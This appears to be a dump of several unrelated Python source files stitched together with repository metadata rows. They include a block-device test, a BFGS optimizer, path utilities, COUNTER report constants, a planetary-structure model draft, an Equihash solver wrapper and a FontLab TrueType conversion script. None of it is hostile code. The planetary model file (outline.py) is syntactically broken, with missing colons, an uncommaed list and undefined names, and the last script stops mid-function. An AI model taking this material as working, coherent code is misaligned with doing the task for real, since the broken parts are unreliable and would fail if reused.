# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Anne Mulhern <amulhern@redhat.com>
"""
tests.test_utils
================
Tests utilities.
.. moduleauthor:: mulhern <amulhern@redhat.com>
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import pyblk
from ._constants import GRAPH
class TestGraphUtils(object):
"""
Test utilities that work over networkx graphs.
"""
# pylint: disable=too-few-public-methods
def test_roots(self):
"""
Verify that roots are really roots.
"""
roots = pyblk.GraphUtils.get_roots(GRAPH)
in_degrees = GRAPH.in_degree(roots)
assert all(in_degrees[r] == 0 for r in roots)
|
gpl-2.0
| -5,400,782,520,455,736,000
| 32.538462
| 77
| 0.706995
| false
| 3.945701
| true
| false
| false
|
eljost/pysisyphus
|
deprecated/optimizers/BFGS.py
|
1
|
4901
|
#!/usr/bin/env python3
import matplotlib.pyplot as plt
import numpy as np
from pysisyphus.helpers import fit_rigid, procrustes
from pysisyphus.optimizers.BacktrackingOptimizer import BacktrackingOptimizer
# [1] Nocedal, Wright - Numerical Optimization, 2006
class BFGS(BacktrackingOptimizer):
def __init__(self, geometry, alpha=1.0, bt_force=20, **kwargs):
super(BFGS, self).__init__(geometry, alpha=alpha,
bt_force=bt_force,
**kwargs)
self.eye = np.eye(len(self.geometry.coords))
try:
self.inv_hessian = self.geometry.get_initial_hessian()
# ChainOfStates objects may not have get_initial_hessian
except AttributeError:
self.inv_hessian = self.eye.copy()
if (hasattr(self.geometry, "internal")
and (self.geometry.internal is not None)):
raise Exception("Have to add hessian projections etc.")
self.log("BFGS with align=True is somewhat broken right now, so "
"the images will be aligned only in the first iteration. "
)
def reset_hessian(self):
self.inv_hessian = self.eye.copy()
self.log("Resetted hessian")
def prepare_opt(self):
if self.is_cos and self.align:
procrustes(self.geometry)
# Calculate initial forces before the first iteration
self.coords.append(self.geometry.coords)
self.forces.append(self.geometry.forces)
self.energies.append(self.geometry.energy)
def scale_by_max_step(self, steps):
steps_max = np.abs(steps).max()
if steps_max > self.max_step:
fact = self.max_step / steps_max
"""
fig, ax = plt.subplots()
ax.hist(steps, bins=20)#"auto")
title = f"max(steps)={steps_max:.04f}, fact={fact:.06f}"
ax.set_title(title)
l1 = ax.axvline(x=self.max_step, c="k")
l2 = ax.axvline(x=-self.max_step, c="k")
ax.add_artist(l1)
ax.add_artist(l2)
fig.savefig(f"cycle_{self.cur_cycle:02d}.png")
plt.close(fig)
"""
steps *= self.max_step / steps_max
return steps
def optimize(self):
last_coords = self.coords[-1]
last_forces = self.forces[-1]
last_energy = self.energies[-1]
unscaled_steps = self.inv_hessian.dot(last_forces)
steps = self.scale_by_max_step(self.alpha*unscaled_steps)
new_coords = last_coords + steps
self.geometry.coords = new_coords
# Hessian rotation seems faulty right now ...
#if self.is_cos and self.align:
# (last_coords, last_forces, steps), _, self.inv_hessian = fit_rigid(
# self.geometry,
# (last_coords,
# last_forces,
# steps),
# hessian=self.inv_hessian)
new_forces = self.geometry.forces
new_energy = self.geometry.energy
skip = self.backtrack(new_forces, last_forces, reset_hessian=True)
if skip:
self.reset_hessian()
self.geometry.coords = last_coords
#self.scale_alpha(unscaled_steps, self.alpha)
return None
# Because we add the step later on we restore the original
# coordinates and set the appropriate energies and forces.
self.geometry.coords = last_coords
self.geometry.forces = new_forces
self.geometry.energy = new_energy
self.forces.append(new_forces)
self.energies.append(new_energy)
# [1] Eq. 6.5, gradient difference, minus force difference
y = -(new_forces - last_forces)
sigma = new_coords - last_coords
# [1] Eq. 6.7, curvature condition
curv_cond = sigma.dot(y)
if curv_cond < 0:
self.log(f"curvature condition {curv_cond:.07} < 0!")
rho = 1.0 / y.dot(sigma)
if ((np.array_equal(self.inv_hessian, self.eye))
# When align = True the above expression will evaluate to
# False. So we also check if we are in the first iteration.
or (self.cur_cycle == 0)):
# [1] Eq. 6.20, p. 143
beta = y.dot(sigma)/y.dot(y)
self.inv_hessian = self.eye*beta
self.log(f"Using initial guess for inverse hessian, beta={beta}")
# Inverse hessian update
A = self.eye - np.outer(sigma, y) * rho
B = self.eye - np.outer(y, sigma) * rho
self.inv_hessian = (A.dot(self.inv_hessian).dot(B)
+ np.outer(sigma, sigma) * rho)
return steps
|
gpl-3.0
| -1,036,933,543,861,177,100
| 39.504132
| 86
| 0.550296
| false
| 3.758436
| false
| false
| false
|
ArcherSys/ArcherSys
|
Lib/genericpath.py
|
1
|
3883
|
"""
Path operations common to more than one OS
Do not use directly. The OS specific modules import the appropriate
functions from this module themselves.
"""
import os
import stat
__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',
'getsize', 'isdir', 'isfile', 'samefile', 'sameopenfile',
'samestat']
# Does a path exist?
# This is false for dangling symbolic links on systems that support them.
def exists(path):
"""Test whether a path exists. Returns False for broken symbolic links"""
try:
os.stat(path)
except OSError:
return False
return True
# This follows symbolic links, so both islink() and isdir() can be true
# for the same path on systems that support symlinks
def isfile(path):
"""Test whether a path is a regular file"""
try:
st = os.stat(path)
except OSError:
return False
return stat.S_ISREG(st.st_mode)
# Is a path a directory?
# This follows symbolic links, so both islink() and isdir()
# can be true for the same path on systems that support symlinks
def isdir(s):
"""Return true if the pathname refers to an existing directory."""
try:
st = os.stat(s)
except OSError:
return False
return stat.S_ISDIR(st.st_mode)
def getsize(filename):
"""Return the size of a file, reported by os.stat()."""
return os.stat(filename).st_size
def getmtime(filename):
"""Return the last modification time of a file, reported by os.stat()."""
return os.stat(filename).st_mtime
def getatime(filename):
"""Return the last access time of a file, reported by os.stat()."""
return os.stat(filename).st_atime
def getctime(filename):
"""Return the metadata change time of a file, reported by os.stat()."""
return os.stat(filename).st_ctime
# Return the longest prefix of all list elements.
def commonprefix(m):
"Given a list of pathnames, returns the longest common leading component"
if not m: return ''
s1 = min(m)
s2 = max(m)
for i, c in enumerate(s1):
if c != s2[i]:
return s1[:i]
return s1
# Are two stat buffers (obtained from stat, fstat or lstat)
# describing the same file?
def samestat(s1, s2):
"""Test whether two stat buffers reference the same file"""
return (s1.st_ino == s2.st_ino and
s1.st_dev == s2.st_dev)
# Are two filenames really pointing to the same file?
def samefile(f1, f2):
"""Test whether two pathnames reference the same actual file"""
s1 = os.stat(f1)
s2 = os.stat(f2)
return samestat(s1, s2)
# Are two open files really referencing the same file?
# (Not necessarily the same file descriptor!)
def sameopenfile(fp1, fp2):
"""Test whether two open file objects reference the same file"""
s1 = os.fstat(fp1)
s2 = os.fstat(fp2)
return samestat(s1, s2)
# Split a path in root and extension.
# The extension is everything starting at the last dot in the last
# pathname component; the root is everything before that.
# It is always true that root + ext == p.
# Generic implementation of splitext, to be parametrized with
# the separators
def _splitext(p, sep, altsep, extsep):
"""Split the extension from a pathname.
Extension is everything from the last dot to the end, ignoring
leading dots. Returns "(root, ext)"; ext may be empty."""
# NOTE: This code must work for text and bytes strings.
sepIndex = p.rfind(sep)
if altsep:
altsepIndex = p.rfind(altsep)
sepIndex = max(sepIndex, altsepIndex)
dotIndex = p.rfind(extsep)
if dotIndex > sepIndex:
# skip all leading dots
filenameIndex = sepIndex + 1
while filenameIndex < dotIndex:
if p[filenameIndex:filenameIndex+1] != extsep:
return p[:dotIndex], p[dotIndex:]
filenameIndex += 1
return p, p[:0]
|
mit
| -4,081,050,003,796,660,000
| 28.195489
| 78
| 0.661087
| false
| 3.698095
| false
| false
| false
|
chill17/pycounter
|
pycounter/constants.py
|
1
|
6177
|
"""Constants used by pycounter."""
NS = {
'SOAP-ENV': "http://schemas.xmlsoap.org/soap/envelope/",
'sushi': "http://www.niso.org/schemas/sushi",
'sushicounter': "http://www.niso.org/schemas/sushi/counter",
'counter': "http://www.niso.org/schemas/counter",
}
METRICS = {
u"JR1": u"FT Article Requests",
u"JR1 GOA": u"Gold Open Access Article Requests",
u"BR1": u"Book Title Requests",
u"BR2": u"Book Section Requests",
u"DB1": [u"Regular Searches",
u"Searches-federated and automated",
u"Result Clicks",
u"Record Views"],
u"DB2": [u"Access denied: concurrent/simultaneous user license exceeded",
u"Access denied: content item not licensed"]
}
DB_METRIC_MAP = {
"search_reg": METRICS["DB1"][0],
"search_fed": METRICS["DB1"][1],
"result_click": METRICS["DB1"][2],
"record_view": METRICS["DB1"][3],
"turnaway": METRICS["DB2"][0],
"no_license": METRICS["DB2"][1]
}
CODES = {
u"Database": u"DB",
u"Journal": u"JR",
u"Book": u"BR",
u"Title": u"TR",
u"Platform": u"PR",
u"Multimedia": u"MR",
u"Consortium": u"CR",
}
# from http://www.niso.org/workrooms/sushi/registry/
# Not all of these are actually supported by pycounter
REPORT_DESCRIPTIONS = {
u'BR1': u'Number of Successful Title Requests by Month and Title',
u'BR2': u'Number of Successful Section Requests by Month and Title',
u'BR3': u'Access Denied to Content Items by Month, Title, and Category',
u'BR4': u'Access Denied to Content Items by Month, Platform, and Category',
u'BR5': u'Total Searches by Month and Title',
u'CR1': u'Number of Successful Full-text Journal Article or Book Chapter '
u'Requests by Month',
u'CR2': u'Total Searches by Month and Database',
u'CR3': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'DB1': u'Total Searches, Result Clicks and Record Views by Month and '
u'Database',
u'DB2': u'Access Denied by Month, Database and Category',
u'JR1': u'Number of Successful Full-Text Article Requests by Month and '
u'Journal',
u'JR1GOA': u'Number of Successful Gold Open Access Full-Text Article '
u'Requests by Month and Journal',
u'JR1a': u'Number of Successful Full-Text Article Requests from an '
u'Archive by Month and Journal',
u'JR2': u'Access Denied to Full Text Articles by Month, Journal, and '
u'Category',
u'JR3': u'Number of Successful Item Requests and Turnaways by Month, '
u'Journal, and Page-Type',
u'JR3mobile': u'Number of Successful Item Requests by Month, Journal, '
u'and Page-Type for usage on a mobile device',
u'JR4': u'Total Searches Run by Month and Collection',
u'JR5': u'Number of Successful Full-Text Article Requests by '
u'Year-of-Publication (YOP) and Journal',
u'MR1': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'MR2': u'Number of Successful Multimedia Full Content Unit Requests by '
u'Month, Collection, and Item Type',
u'PR1': u'Total Searches, Result Clicks, and Record Views by Month and '
u'Platform',
u'TR1': u'Number of Successful Requests for Journal Full-Text Articles '
u'and Book Sections by Month and Title',
u'TR1mobile': u'Number of Successful Requests for Journal Full-Text '
u'Articles and Book Sections by Month and Title '
u'(formatted for normal browsers/delivered to mobile '
u'devices AND formatted for mobile devices/delivered '
u'to mobile devices)',
u'TR2': u'Access Denied to Full-Text Items by Month, Title, and Category',
u'TR3': u'Number of Successful Item Requests by Month, Title, and '
u'Page-Type',
u'TR3mobile': u'Number of Successful Item Requests by Month, Title, '
u'and Page-Type (formatted for normal browsers/delivered '
u'to mobile devices and for mobile devices/delivered to '
u'mobile devices)',
}
HEADER_FIELDS = {
"JR1": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR2": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR3": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"BR1": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR2": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR3": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"DB1": (
u'Database',
u'Publisher',
u'Platform',
u'User Activity',
u'Reporting Period Total',
),
"DB2": (
u'Database',
u'Publisher',
u'Platform',
u'Access denied category',
u'Reporting Period Total',
),
}
TOTAL_TEXT = {
'JR1': u'Total for all journals',
'BR1': u'Total for all titles',
'BR2': u'Total for all titles',
'DB2': u'Total for all databases',
}
|
mit
| -3,423,670,937,387,437,600
| 32.754098
| 79
| 0.583293
| false
| 3.531732
| false
| false
| false
|
smwahl/PlLayer
|
outline.py
|
1
|
8657
|
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import matplotlib
from copy import deepcopy
class planet
''' Represents a snapshot of an evoloving planet, with methods
for comparing different snapshots and relating thermal evolution to
time.'''
def __init__(self, params=None, pcopy=None):
''' Create planet snapshot, either with new parameters or with
another planet object.'''
self.layers = []
self.boundaries = []
self.mass = None
self.radius = None
# tracks whether structure (radii,T-profiles) have been calculated since modifications were made
self.structured = False
if not pcopy is none:
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.mass = deepcopy(pcopy.mass)
self.radius = deepcopy(pcopy.layers)
def setLayers(self,layers):
''' Define the layers to be included in the planet snapshot.
Note: incormation not copied'''
self.layers = layers
# add layers consistant with the boundaries
self.boundaries = []
for layer in layers:
lbounds = layer.boundaries
self.boundaries += [ lb for lb in lbounds if lb not in self.boundaries ]
def setBoundaries(self,boundaries):
''' Define the layers to be included in the planet snapshot.
Note: Information not copied'''
self.boundaries = boundaries
# add layers consistant with the boundaries
self.layers = []
for bound in boundaries:
blayers = bound.layers
self.layers += [ bl for bl in blayers if bl not in self.layers ]
# Following functions will probably be feature of the more specific model,
# might want to add placeholder functions, however.
# def stepT(dT,boundary):
# ''' Simulated timestep in which a boundaries lower temperature is
# changed by dT'''
# def QtoTime(self,dQ):
# ''' Placeholder, should be defined by specific model '''
# def diff(comp_snapshot):
# ''' Compare energy and entropy budgets of various layers. Relates the
# difference to a heat flow for one snapshot to evolve into the previous one.'''
# def structure(T,boundary):
# ''' Integrate Strucuture, specifing the temperature at a boundary '''
def budgets():
''' Report integrated energy and entropy budgets for layers in the planet'''
pass
class xlznCorePlanet(planet):
''' Represent particular situation of a crystallizing metallic core with a
simple model for mantle evoloution'''
def __init__(self,planet_file=None,pcopy=None):
''' Initizialize xlznCorePlanet object. Will eventually want to take input
file names as arguments.'''
if not pcopy is None:
self.mantle = deepcopy(pcopy.mantle)
self.core = deepcopy(pcopy.core)
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.surface = deepcopy(pcopy.surface)
self.cmb = deepcopy(pcopy.cmb)
self.icb = deepcopy(pcopy.icb)
self.center = deepcopy(pcopy.center)
self.mass = pcopy.mass
self.radius = pcopy.radius
self.mantle_density = pcopy.mantle_density
self.core_mass = pcopy.core_mass
self.structured = pcopy.structured
return None
# Define materials from text files
rock = material('simpleSilicateMantle.txt')
liqFeS = material('binaryFeS.txt',mtype='liquid')
solFe = material('simpleSolidIron.txt')
# Define melting/solidifcation relationships under consideration
liqFeS.interpLiquidus('FeS',solFe)
self.mantle = layer('mantle',material=rock)
self.core = xlznLayer('core', material=liqFeS, layernames=['outer_core','inner_core'],
boundnames=['icb'])
# set list of layers (self.core.layers should initially return a sinlge liquid layer
self.layers = [self.mantle] + self.core.layers
# set list of boundaries
self.boundaries = GenerateBoundaries(self.layers,['surface','cmb','center'])
self.surface = boundaries[0], self.cmb = boundaries[1], self.center = boundaries[-1]
self.icb = None # indicates icb has yet to form
# read in parameters from file and decide whether this is new planet or a continuation
# at a different condition
try:
params = parseParamFile(open(planet_file,'r'))
except:
raise Exception('File not found: {}'.format(planet_file))
try:
cmb.r = params.Rcore
self.mass = params.Mplanet
self.radius = params.Rplanet
core_radius = params.Rcore
self.cmb.r = core_radius
self.surface.r = self.radius
self.mantle_density = None
self.core_mass = None
self.center.P = P0
self.cmb.T = params.Tcmb
smode = 'initial'
except:
try:
self.mass = params.Mplanet
self.mantle_density = params.rhomantle
self.core_mass = params.Mcore
self.core.M = core_mass
self.center.P = P0
self.cmb.T = params.Tcmb
self.radius = None
smode = 'cont'
except:
raise Exception('Invalid input file.')
# Integrate structure (making entire stucture consistant with starting values
success = self.structure(mode=smode)
# should check to make sure the integration succeeded
if success:
self.radius = self.surface.r
#self.mantle_density =
self.core_mass = pcopy.core.M
self.structured = pcopy.structured
Mplanet = self.mass
Mcore = self.core_mass
rhomantle = self.mantle_density
PO = self.center.P
params = [ Mplanet Mcore rhomantle P0]
# write new parameter file to run a planet with consistent mass and mantle density
writeParamFile(open('./xlzncoreplanet_cont.txt','w'),params)
return None
else
raise Exception
class layer(object):
''' A layer is a portion of a planet with an adiabatic temperature profile,
composed of a single material '''
def __init__(self,name='',mass=None,material=None,comp=None):
self.name = name
self.boundaries = None
self.mass = mass
self.material = material
self.comp = comp
def specEnergy():
pass
class liquidLayer(layer):
''' A liquid layer has a specific entropy which can be related to viscous and/or
ohmic dissipation.'''
def specEntropy():
pass
class xlznLayer(object):
''' Defines a layer of liquid material that is free to crystalize upon cooling.
Contains a list of solids with a corresponding liquidus. Upon intersection
of the liquidus, there are three possible occurances upon intersection with
a liquidus.
1) solid more dense and adiabat remains below liquidus to the bottom of the
layer, forming a settled region at the bottom.
2) Identical case with less dense settling to the top
3) 'Snow' regime, where sink/floating crystals would remelt before settling
for 1) and 2) a separate solid layer is formed. For 3) the liquid adiabat
is instead constrained to follow the liquidus'''
self.name
self.liquid
self.solids
self.comp # Mass ratio of different components
self.mass
self.liquidi # a liquidi corresponding to each solid phase
self.adiabat # a modified adiabat, following the liquidus in a 'snow' region.
class boundary(object):
self.T # upper and lower temperature
self.d
self.layers
def calcEnergy():
pass
def calcEntropy():
pass
class Material(object):
'''Class for keeping track of various physical properties of a material and how
these vary as a function of P, T and composition.'''
self.liquidus
self.components
self.td_params # holds functions for returning thermodynamic parameters
def interp_liquidus(data_file,solid):
pass
def set_td_params(self,param_file):
pass
def shellIntegral(funcs,r0=0.,r1=1.,tols=[],limits=[]):
''' Integrate an arbitrary number of function
|
mit
| -6,883,647,413,842,892,000
| 32.296154
| 104
| 0.621116
| false
| 4.178089
| false
| false
| false
|
slush0/epycyzm
|
morpavsolver/__init__.py
|
1
|
3468
|
# https://github.com/morpav/zceq_solver--bin
from cffi import FFI
import os.path
import inspect
ffi = None
library = None
library_header = """
typedef struct {
char data[1344];
} Solution;
typedef struct {
unsigned int data[512];
} ExpandedSolution;
typedef struct HeaderAndNonce {
char data[140];
} HeaderAndNonce;
typedef struct ZcEquihashSolverT ZcEquihashSolver;
ZcEquihashSolver* CreateSolver(void);
void DestroySolver(ZcEquihashSolver* solver);
int FindSolutions(ZcEquihashSolver* solver, HeaderAndNonce* inputs,
Solution solutions[], int max_solutions);
int ValidateSolution(ZcEquihashSolver* solver, HeaderAndNonce* inputs, Solution* solutions);
void RunBenchmark(long long nonce_start, int iterations);
bool ExpandedToMinimal(Solution* minimal, ExpandedSolution* expanded);
bool MinimalToExpanded(ExpandedSolution* expanded, Solution* minimal);
"""
def load_library(path=None):
global library, ffi
assert library is None
ffi = FFI()
ffi.cdef(library_header)
if path is None:
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'morpavsolver.so')
library = ffi.dlopen(path)
assert library is not None
class Solver:
def __init__(self):
self.solver_ = self.header_ = self.solutions_ = self.solution_to_check_ = None
self._ensure_library()
assert library and ffi
self.solver_ = library.CreateSolver()
self.header_ = ffi.new("HeaderAndNonce*")
self.solutions_ = ffi.new("Solution[16]")
self.solution_to_check_ = ffi.new("Solution*")
self.expanded_tmp_ = ffi.new("ExpandedSolution*")
def __del__(self):
# Free the underlying resources on destruction
library.DestroySolver(self.solver_);
self.solver_ = None
# cffi's cdata are collected automatically
self.header_ = self.solutions_ = self.solution_to_check_ = None
def _ensure_library(self):
# Try to load library from standard
if (library is None):
load_library()
def run_benchmark(self, iterations=10, nonce_start=0):
library.RunBenchmark(nonce_start, iterations)
def find_solutions(self, block_header):
assert len(block_header) == 140
self.header_.data = block_header
return library.FindSolutions(self.solver_, self.header_, self.solutions_, 16);
def get_solution(self, num):
assert(num >= 0 and num < 16)
return bytes(ffi.buffer(self.solutions_[num].data))
def validate_solution(self, block_header, solution):
assert len(block_header) == 140
assert len(solution) == 1344
self.solution_to_check_.data = solution
return library.ValidateSolution(self.solver_, self.header_, self.solution_to_check_);
def list_to_minimal(self, expanded):
if isinstance(expanded, (list, tuple)):
assert len(expanded) == 512
minimal = ffi.new("Solution*")
tmp = self.expanded_tmp_
for i, idx in enumerate(expanded):
tmp.data[i] = idx
expanded = tmp
res = library.ExpandedToMinimal(minimal, expanded)
assert res
return minimal
def minimal_to_list(self, minimal):
tmp = self.expanded_tmp_
res = library.MinimalToExpanded(tmp, minimal)
assert res
result = [tmp.data[i] for i in range(512)]
return result
__all__ = ['Solver', 'load_library']
|
mit
| 957,639,449,207,624,700
| 28.896552
| 93
| 0.654268
| false
| 3.729032
| false
| false
| false
|
adobe-type-tools/fontlab-scripts
|
TrueType/convertToTTF.py
|
1
|
28980
|
#FLM: Convert PFA/UFO/TXT to TTF/VFB
# coding: utf-8
__copyright__ = __license__ = """
Copyright (c) 2015-2016 Adobe Systems Incorporated. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
__doc__ = """
Convert PFA/UFO/TXT to TTF/VFB
This FontLab script will convert one or more hinted PFA/UFO or TXT files
into TTF files, for use as input for makeOTF.
The script will first ask for a directory, which usually should be the
family's top-most folder. It will then crawl through that folder and
process all input files it finds. In addition to the directory, the script
will also ask for an encoding file. This encoding file is a FontLab '.enc'
file which the script will use for ordering the glyphs.
Note:
This script imports the `Input TrueType Hints` script, therefore needs to be
run from the same folder.
==================================================
Versions:
v1.7 - Jun 17 2016 - Skip 'prep' table processing if the font doesn't have it.
v1.6 - Apr 25 2016 - Replace ttx commands by fontTools operations.
v1.5 - Jul 17 2015 - Turn off the addition of NULL and CR glyphs.
v1.4 - Apr 17 2015 - Support changes made to inputTTHints module.
v1.3 - Apr 02 2015 - Now also works properly on FL Windows.
v1.2 - Mar 26 2015 - Move code reading external `tthints` file to an adjacent
module.
v1.1 - Mar 23 2015 - Allow instructions in x-direction.
v1.0 - Mar 04 2015 - Initial public release (Robothon 2015).
"""
import os
import re
import sys
import time
from FL import *
import fl_cmd
try:
import dvInput_module
dvModuleFound = True
except:
dvModuleFound = False
fl.output = ''
errorHappened = False
# ----------------------------------------------------------------------------------------
# Find and import inputTTHints module:
def findFile(fileName, path):
'Find file of given fileName, starting at path.'
for root, dirs, files in os.walk(path):
if fileName in files:
return os.path.join(root)
else:
return None
moduleName = 'inputTTHints.py'
userFolder = os.path.expanduser('~')
customModulePathMAC = os.sep.join((
userFolder, 'Library', 'Application Support',
'FontLab', 'Studio 5', 'Macros'))
customModulePathPC = os.sep.join((
userFolder, 'Documents', 'FontLab', 'Studio5', 'Macros'))
possibleModulePaths = [fl.userpath, customModulePathMAC, customModulePathPC]
print '\nLooking for %s ... ' % (moduleName)
for path in possibleModulePaths:
modPath = findFile(moduleName, path)
if modPath:
print 'found at %s' % modPath
break
if not modPath:
# Module was not found. World ends.
errorHappened = True
print 'Not found in the following folders:\n%s\n\
Please make sure the possibleModulePaths list in this script \
points to a folder containing %s' % ('\n'.join(possibleModulePaths), moduleName)
else:
# Module was found, import it.
if modPath not in sys.path:
sys.path.append(modPath)
import inputTTHints
# ----------------------------------------------------------------------------------------
MAC = False
PC = False
if sys.platform in ('mac', 'darwin'):
MAC = True
elif os.name == 'nt':
PC = True
# Add the FDK path to the env variable (on Mac only) so
# that command line tools can be called from FontLab
if MAC:
fdkPathMac = os.sep.join((
userFolder, 'bin', 'FDK', 'tools', 'osx'))
envPath = os.environ["PATH"]
newPathString = envPath + ":" + fdkPathMac
if fdkPathMac not in envPath:
os.environ["PATH"] = newPathString
if PC:
from subprocess import Popen, PIPE
# ----------------------------------------------------------------------------------------
# Import the FDK-embedded fontTools
if MAC:
osFolderName = "osx"
if PC:
osFolderName = "win"
fontToolsPath = os.sep.join((
userFolder, 'bin', 'FDK', 'Tools',
osFolderName, 'Python', 'AFDKOPython27', 'lib',
'python2.7', 'site-packages', 'FontTools'))
if fontToolsPath not in sys.path:
sys.path.append(fontToolsPath)
try:
from fontTools import ttLib
except ImportError:
print "\nERROR: FontTools Python module is not installed.\nGet the latest version at https://github.com/behdad/fonttools"
errorHappened = True
# ----------------------------------------------------------------------------------------
# constants:
kPPMsFileName = "ppms"
kTTHintsFileName = "tthints"
kGOADBfileName = "GlyphOrderAndAliasDB"
kTempEncFileName = ".tempEncoding"
kFontTXT = "font.txt"
kFontUFO = "font.ufo"
kFontTTF = "font.ttf"
flPrefs = Options()
flPrefs.Load()
def readFile(filePath):
file = open(filePath, 'r')
fileContent = file.read().splitlines()
file.close()
return fileContent
def writeFile(contentList, filePath):
outfile = open(filePath, 'w')
outfile.writelines(contentList)
outfile.close()
def getFontPaths(path):
fontsList = []
for root, folders, files in os.walk(path):
fileAndFolderList = folders[:]
fileAndFolderList.extend(files)
pfaRE = re.compile(r'(^.+?\.pfa)$', re.IGNORECASE)
ufoRE = re.compile(r'(^.+?\.ufo)$', re.IGNORECASE)
txtRE = re.compile(r'^font.txt$', re.IGNORECASE)
pfaFiles = [
match.group(1) for item in fileAndFolderList
for match in [pfaRE.match(item)] if match]
ufoFiles = [
match.group(1) for item in fileAndFolderList
for match in [ufoRE.match(item)] if match]
txtFiles = [
match.group(0) for item in fileAndFolderList
for match in [txtRE.match(item)] if match]
# Prioritizing the list of source files, so that only one of them is
# found and converted; in case there are multiple possible files in
# a single folder. Order of priority is PFA - UFO - TXT.
allFontsFound = pfaFiles + ufoFiles + txtFiles
if len(allFontsFound):
item = allFontsFound[0]
fontsList.append(os.path.join(root, item))
else:
continue
return fontsList
def getGOADB2ndColumn(goadbList):
'Get the second column of the original GOADB file and return it as a list.'
resultList = []
lineNum = 1
skippedLines = 0
re_match1stCol = re.compile(r"(\S+)\t(\S+)(\t\S+)?")
for line in goadbList:
# allow for comments:
line = line.split('#')[0]
# Skip over blank lines
stripline = line.strip()
if not stripline:
skippedLines += 1
continue
result = re_match1stCol.match(line)
if result: # the result can be None
resultList.append(result.group(2) + '\n')
else: # nothing matched
print "Problem matching line %d (current GOADB)" % lineNum
lineNum += 1
if (len(goadbList) != (len(resultList) + skippedLines)):
print "ERROR: There was a problem processing the current GOADB file"
return None
else:
return resultList
def makeTempEncFileFromGOADB(goadbPath):
goadbFileContent = readFile(goadbPath)
goadb2ndColumnList = getGOADB2ndColumn(goadbFileContent)
if not goadb2ndColumnList:
return None
encPath = os.path.join(os.path.dirname(goadbPath), kTempEncFileName)
writeFile(goadb2ndColumnList, encPath)
return encPath
def readPPMsFile(filePath):
lines = readFile(filePath)
hPPMsList = []
vPPMsList = []
for i in range(len(lines)):
line = lines[i]
# Skip over blank lines
stripline = line.strip()
if not stripline:
continue
# Get rid of all comments
if line.find('#') >= 0:
continue
else:
if "X:" in line:
vPPMsList.append(line)
else:
hPPMsList.append(line)
return hPPMsList, vPPMsList
def replaceStemsAndPPMs(hPPMsList, vPPMsList):
if len(hPPMsList) != len(fl.font.ttinfo.hstem_data):
print "\tERROR: The amount of H stems does not match"
return
if len(vPPMsList) != len(fl.font.ttinfo.vstem_data):
print "\tERROR: The amount of V stems does not match"
return
for i in range(len(fl.font.ttinfo.hstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = hPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.hstem_data[i] = stem
for i in range(len(fl.font.ttinfo.vstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = vPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.vstem_data[i] = stem
def processZonesArray(inArray):
outArray = []
for x in range(len(inArray)/2):
if inArray[x * 2] < 0:
outArray.append(inArray[x * 2])
outArray.append(inArray[x * 2 + 1])
outArray.sort()
return outArray
def removeBottomZonesAboveBaseline():
baselineZonesWereRemoved = False
# this is a single master font, so only the
# first array will have non-zero values:
newOtherBluesArray = processZonesArray(fl.font.other_blues[0])
if (fl.font.other_blues_num != len(newOtherBluesArray)):
# trim the number of zones
